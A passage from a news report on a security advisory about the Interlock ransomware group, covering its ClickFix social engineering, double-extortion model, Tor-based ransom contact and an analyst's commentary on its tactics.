They have also employed ClickFix, a social engineering method that tricks victims into running a malicious payload under the pretense of resolving a system issue. Once inside, the actors then deploy various methods for discovery, credential access, and lateral movement to spread to other systems on the network.
Interlock actors employ a double extortion model in which actors encrypt systems after exfiltrating data, increasing pressure on victims to pay the ransom to both get their data decrypted and prevent it from being leaked, the advisory stated. Moreover, ransom demand or payment instructions are not included in the ransom notes. Instead, victims are provided with a unique code and are instructed to contact the ransomware group via a .onion URL through the Tor browser, noted the advisory.
“What makes Interlock uniquely dangerous is not the technical novelty of its encryption payload, but its orchestration of psychological and procedural blind spots across the enterprise. This group has weaponised familiarity by using trusted UI elements like the Windows Explorer address bar to execute remote access trojans with minimal user suspicion,” said Sanchit Vir Gogia, chief analyst and CEO at Greyhound Research. “They exploit patch cycles, user habits, and the assumed sanctity of digital hygiene. By embedding across multiple vectors, such as social, technical, and procedural, Interlock increases recovery cost not just in infrastructure, but in trust and governance posture. Its pivot from fake CAPTCHA prompts to deceptive ‘fix’ messages reflects an agile, feedback-driven threat actor able to learn and adapt faster than most enterprise defence protocols can cycle.”
